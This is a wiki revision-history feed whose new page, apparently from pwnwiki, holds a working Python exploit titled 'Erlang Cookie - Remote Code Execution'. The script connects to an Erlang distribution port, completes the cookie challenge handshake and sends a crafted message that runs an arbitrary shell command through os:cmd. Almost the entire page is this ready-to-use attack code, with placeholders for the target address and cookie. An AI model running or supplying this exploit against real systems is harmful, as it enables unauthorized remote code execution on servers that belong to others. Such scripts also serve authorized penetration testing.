https://pwnwiki.com/index.php?action=history&feed=atom&title=Erlang_Cookie_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
Erlang Cookie 遠程代碼執行漏洞 - Revision history
2026-04-21T05:36:26Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Erlang_Cookie_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=1495&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Erlang Cookie - Remote Code Execution # Date: 2020-05-04 # Exploit Author: 1F98D # Original Author: Milton Valencia (wetw0rk) # Software Link: h..."
2021-04-11T01:07:51Z
<p>Created page with "==EXP== <pre> # Exploit Title: Erlang Cookie - Remote Code Execution # Date: 2020-05-04 # Exploit Author: 1F98D # Original Author: Milton Valencia (wetw0rk) # Software Link: h..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: Erlang Cookie - Remote Code Execution<br />
# Date: 2020-05-04<br />
# Exploit Author: 1F98D<br />
# Original Author: Milton Valencia (wetw0rk)<br />
# Software Link: https://www.erlang.org/<br />
# Version: N/A<br />
# Tested on: Debian 9.11 (x64)<br />
# References:<br />
# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/<br />
#<br />
# Erlang allows distributed Erlang instances to connect and remotely execute commands.<br />
# Nodes are permitted to connect to eachother if they share an authentication cookie,<br />
# this cookie is commonly called ".erlang.cookie"<br />
# <br />
#!/usr/local/bin/python3<br />
<br />
import socket<br />
from hashlib import md5<br />
import struct<br />
import sys<br />
<br />
TARGET = "192.168.1.1"<br />
PORT = 25672<br />
COOKIE = "XXXXXXXXXXXXXXXXXXXX"<br />
CMD = "whoami"<br />
<br />
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
s.connect((TARGET, PORT))<br />
<br />
name_msg = b"\x00"<br />
name_msg += b"\x15"<br />
name_msg += b"n"<br />
name_msg += b"\x00\x07"<br />
name_msg += b"\x00\x03\x49\x9c"<br />
name_msg += b"AAAAAA@AAAAAAA"<br />
<br />
s.send(name_msg)<br />
s.recv(5) # Receive "ok" message<br />
challenge = s.recv(1024) # Receive "challenge" message<br />
challenge = struct.unpack(">I", challenge[9:13])[0]<br />
<br />
print("Extracted challenge: {}".format(challenge))<br />
<br />
challenge_reply = b"\x00\x15"<br />
challenge_reply += b"r"<br />
challenge_reply += b"\x01\x02\x03\x04"<br />
challenge_reply += md5(bytes(COOKIE, "ascii") + bytes(str(challenge), "ascii")).digest()<br />
<br />
s.send(challenge_reply)<br />
challenge_res = s.recv(1024)<br />
if len(challenge_res) == 0:<br />
print("Authentication failed, exiting")<br />
sys.exit(1)<br />
<br />
print("Authentication successful")<br />
<br />
ctrl = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex"<br />
msg = b'\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k'<br />
msg += struct.pack(">H", len(CMD))<br />
msg += bytes(CMD, 'ascii')<br />
msg += b'jw\x04user'<br />
<br />
payload = b'\x70' + ctrl + msg<br />
payload = struct.pack('!I', len(payload)) + payload<br />
print("Sending cmd: '{}'".format(CMD))<br />
s.send(payload)<br />
print(s.recv(1024))<br />
</pre></div>
Pwnwiki